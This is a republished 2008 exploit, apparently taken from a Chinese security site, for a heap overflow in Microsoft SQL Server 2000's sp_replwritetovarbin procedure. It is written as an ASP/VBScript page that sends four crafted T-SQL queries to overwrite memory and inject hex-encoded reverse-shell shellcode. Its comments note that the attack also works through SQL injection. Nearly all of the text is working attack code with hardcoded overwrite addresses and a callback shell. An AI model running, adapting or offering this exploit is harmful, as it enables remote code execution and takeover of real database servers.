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Microsoft SQL Server sp_replwritetovarbin() Heap Overflow Exploit (0day)
来源:www.vfcocus.net 作者:k`sOSe 发布时间:2008-12-18  
// k`sOSe 12/17/2008
// Microsoft SQL Server "sp_replwritetovarbin()" Heap Overflow
// Tested on Win2k SP4 with MSSQL 2000(on one box only!).
// Shellcode is a slightly modified metasploit reverse shell(on port 4445),
// the change allows multiple shots :)
// You need a valid SQL account, but you can also use this through an SQL-Injection simply by injecting the T-SQL stuff.

// Take a look at the comments in T-SQL

On Error Resume Next

// change this
UserName = "r00t"
Password = "t00r"

// ########################################### FIRST QUERY
SQL = "DECLARE @buf NVARCHAR(4000), "&_
"@val NVARCHAR(4), "&_
"@counter INT "&_
"SET @buf = ' "&_
"declare @retcode int, "&_
"@end_offset int, "&_
"@vb_buffer varbinary, "&_
"@vb_bufferlen int "&_ 
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41) "&_
"SET @counter = 0 "&_
"WHILE @counter < 3020 "&_
"BEGIN "&_
"  SET @counter = @counter + 1 "&_
"  IF @counter = 2900 "&_
"  BEGIN "&_
"    SET @val =  CHAR(0x43) "&_
"  END "&_
"  ELSE IF @counter = 299 "&_
"  BEGIN "&_
"    SET @val =  CHAR(0x42) "&_
"  END "&_
"  ELSE IF @counter = 300 "&_
"  BEGIN "&_

"     /* First byte overwritten here. This is a random writable address */ "&_
"     SET @buf = @buf + CHAR(0x44) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
"     CONTINUE "&_
"  END "&_
"  SET @buf = @buf + @val "&_
"END "&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"

// ########################################### SECOND QUERY
SQL2 = "DECLARE @buf NVARCHAR(4000), "&_
"@val NVARCHAR(4), "&_
"@counter INT "&_
"SET @buf = ' "&_
"declare @retcode int, "&_
"@end_offset int, "&_
"@vb_buffer varbinary, "&_
"@vb_bufferlen int "&_ 
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41) "&_
"SET @counter = 0 "&_
"WHILE @counter < 3097 "&_
"BEGIN "&_
"  SET @counter = @counter + 1 "&_
"  IF @counter = 2900 "&_
"  BEGIN "&_
"    SET @val =  CHAR(0x43) "&_
"  END "&_
"  ELSE IF @counter = 299 "&_
"  BEGIN "&_
"    SET @val =  CHAR(0x42) "&_
"  END "&_
"  ELSE IF @counter = 300 "&_
"  BEGIN "&_

"     /* Second byte overwritten here */ "&_
"     SET @buf = @buf + CHAR(0x45) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
"     CONTINUE "&_
"  END "&_
"  SET @buf = @buf + @val "&_
"END "&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"

// ########################################### THIRD QUERY
SQL3 = "DECLARE @buf NVARCHAR(4000), "&_
"@val NVARCHAR(4), "&_
"@counter INT "&_
"SET @buf = ' "&_
"declare @retcode int, "&_
"@end_offset int, "&_
"@vb_buffer varbinary, "&_
"@vb_bufferlen int "&_ 
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41) "&_
"SET @counter = 0 "&_
"WHILE @counter < 3021 "&_
"BEGIN "&_
"  SET @counter = @counter + 1 "&_
"  IF @counter = 2900 "&_
"  BEGIN "&_
"    SET @val =  CHAR(0x43) "&_
"  END "&_
"  ELSE IF @counter = 299 "&_
"  BEGIN "&_
"    SET @val =  CHAR(0x42) "&_
"  END "&_
"  ELSE IF @counter = 300 "&_
"  BEGIN "&_

"     /* Third byte overwritten here */ "&_
"     SET @buf = @buf + CHAR(0x46) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
"     CONTINUE "&_
"  END "&_
"  SET @buf = @buf + @val "&_
"END "&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"

// ########################################### FOURTH QUERY
SQL4 = "DECLARE @buf NVARCHAR(4000), "&_
"@val NVARCHAR(4), "&_
"@counter INT "&_
"SET @buf = ' "&_
"declare @retcode int, "&_
"@end_offset int, "&_
"@vb_buffer varbinary, "&_
"@vb_bufferlen int "&_ 
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41) "&_
"SET @counter = 0 "&_
"WHILE @counter < 2708 "&_
"BEGIN "&_
"  SET @counter = @counter + 1 "&_
"  IF @counter = 2900 "&_
"  BEGIN "&_
"    SET @val =  CHAR(0x43) "&_
"  END "&_
"  IF @counter = 108 "&_
"  BEGIN "&_

"     /* this is the pointer we wrote - 0x38. It points to a CALL ECX */ "&_
"    SET @buf = @buf + CHAR(0x10) + CHAR(0xc0) + CHAR(0x4c) + CHAR(0x19) "&_

"     /* realign code */ "&_
"    SET @buf = @buf + CHAR(0xe1) "&_

"     /* realign the stack */ "&_
"    SET @buf = @buf + CHAR(0x83) + CHAR(0xe4) + CHAR(0xfc) "&_

"     /* jump ahead */ "&_
"    SET @buf = @buf + CHAR(0xe9) + CHAR(0xba) + CHAR(0x00) + CHAR(0x00) + CHAR(0x00) "&_
"    SET @counter = @counter + 12 "&_
"    CONTINUE "&_
"  END "&_
"  ELSE IF @counter = 299 "&_
"  BEGIN "&_
"    SET @val =  CHAR(0x42) "&_
"  END "&_
"  ELSE IF @counter = 300 "&_
"  BEGIN "&_

"     /* Fourth byte overwritten here */ "&_
"     SET @buf = @buf + CHAR(0x47) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_

"     /* reverse shell on */ "&_
"     SET @buf=@buf+CHAR(0xfc)+CHAR(0x6a)+CHAR(0xeb)+CHAR(0x4d)+CHAR(0xe8)+CHAR(0xf9)+CHAR(0xff)+CHAR(0xff)+CHAR(0xff)+CHAR(0x60)+CHAR(0x8b)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x24)+CHAR(0x8b)+CHAR(0x45)+CHAR(0x3c)+CHAR(0x8b)+CHAR(0x7c)+CHAR(0x05)+CHAR(0x78)+CHAR(0x01)+CHAR(0xef)+CHAR(0x8b)+CHAR(0x4f)+CHAR(0x18)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x20)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x49)+CHAR(0x8b)+CHAR(0x34)+CHAR(0x8b)+CHAR(0x01)+CHAR(0xee)+CHAR(0x31)+CHAR(0xc0)+CHAR(0x99)+CHAR(0xac)+CHAR(0x84)+CHAR(0xc0)+CHAR(0x74)+CHAR(0x07)+CHAR(0xc1)+CHAR(0xca)+CHAR(0x0d)+CHAR(0x01)+CHAR(0xc2)+CHAR(0xeb)+CHAR(0xf4)+CHAR(0x3b)+CHAR(0x54)+CHAR(0x24)+CHAR(0x28)+CHAR(0x75)+CHAR(0xe5)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x24)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x66)+CHAR(0x8b)+CHAR(0x0c)+CHAR(0x4b)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x1c)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x03)+CHAR(0x2c)+CHAR(0x8b)+CHAR(0x89)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x1c)+CHAR(0x61)+CHAR(0xc3)+CHAR(0x31)+CHAR(0xdb)+CHAR(0x64)+CHAR(0x8b)+CHAR(0x43)+CHAR(0x30)+CHAR(0x8b)+CHAR(0x40)+CHAR(0x0c)+CHAR(0x8b)+CHAR(0x70)+CHAR(0x1c)+CHAR(0xad)+CHAR(0x8b)+CHAR(0x40)+CHAR(0x08)+CHAR(0x5e)+CHAR(0x68)+CHAR(0x8e)+CHAR(0x4e)+CHAR(0x0e)+CHAR(0xec)+CHAR(0x50)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x66)+CHAR(0x53)+CHAR(0x66)+CHAR(0x68)+CHAR(0x33)+CHAR(0x32)+CHAR(0x68)+CHAR(0x77)+CHAR(0x73)+CHAR(0x32)+CHAR(0x5f)+CHAR(0x54)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xcb)+CHAR(0xed)+CHAR(0xfc)+CHAR(0x3b)+CHAR(0x50)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x5f)+CHAR(0x89)+CHAR(0xe5)+CHAR(0x66)+CHAR(0x81)+CHAR(0xed)+CHAR(0x08)+CHAR(0x02)+CHAR(0x55)+CHAR(0x6a)+CHAR(0x02)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xd9)+CHAR(0x09)+CHAR(0xf5)+CHAR(0xad)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x53)+CHAR(0x53)+CHAR(0x53)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x01)+CHAR(0x66)+CHAR(0x68)+CHAR(0x11)+CHAR(0x5d)+CHAR(0x66)+CHAR(0x53)+CHAR(0x89)+CHAR(0xe1)+CHAR(0x95)+CHAR(0x68)+CHAR(0xec)+CHAR(0xf9)+CHAR(0xaa)+CHAR(0x60)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x6a)+CHAR(0x10)+CHAR(0x51)+CHAR(0x55)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x66)+CHAR(0x6a)+CHAR(0x64)+CHAR(0x66)+CHAR(0x68)+CHAR(0x63)+CHAR(0x6d)+CHAR(0x6a)+CHAR(0x50)+CHAR(0x59)+CHAR(0x29)+CHAR(0xcc)+CHAR(0x89)+CHAR(0xe7)+CHAR(0x6a)+CHAR(0x44)+CHAR(0x89)+CHAR(0xe2)+CHAR(0x31)+CHAR(0xc0)+CHAR(0xf3)+CHAR(0xaa)+CHAR(0x95)+CHAR(0x89)+CHAR(0xfd)+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2d)+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2c)+CHAR(0x8d)+CHAR(0x7a)+CHAR(0x38)+CHAR(0xab)+CHAR(0xab)+CHAR(0xab)+CHAR(0x68)+CHAR(0x72)+CHAR(0xfe)+CHAR(0xb3)+CHAR(0x16)+CHAR(0xff)+CHAR(0x75)+CHAR(0x28)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x5b)+CHAR(0x57)+CHAR(0x52)+CHAR(0x51)+CHAR(0x51)+CHAR(0x51)+CHAR(0x6a)+CHAR(0x01)+CHAR(0x51)+CHAR(0x51)+CHAR(0x55)+CHAR(0x51)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xad)+CHAR(0xd9)+CHAR(0x05)+CHAR(0xce)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x6a)+CHAR(0xff)+CHAR(0xff)+CHAR(0x37)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xe7)+CHAR(0x79)+CHAR(0xc6)+CHAR(0x79)+CHAR(0xff)+CHAR(0x75)+CHAR(0x04)+CHAR(0xff)+CHAR(0xd6)+CHAR(0xff)+CHAR(0x77)+CHAR(0xfc)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xef)+CHAR(0xce)+CHAR(0xe0)+CHAR(0x60)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd6) "&_
"     CONTINUE "&_
"  END "&_
"  SET @buf = @buf + @val "&_
"END "&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"

Set oConnection = Server.CreateObject("ADODB.Connection")
oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password
Set rs = Server.CreateObject("ADODB.Recordset")

phase = Request.Querystring("p")

if phase then
if phase = 1 then
rs.open SQL3, oConnection
Set oConnection = Nothing
elseif phase = 2 then
rs.open SQL4, oConnection
Set oConnection = Nothing
end if
rs.open SQL, oConnection
Set oConnection = Nothing

Set oConnection = Server.CreateObject("ADODB.Connection")
oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password
Set rs = Server.CreateObject("ADODB.Recordset")
rs.open SQL2, oConnection
Set oConnection = Nothing

end if



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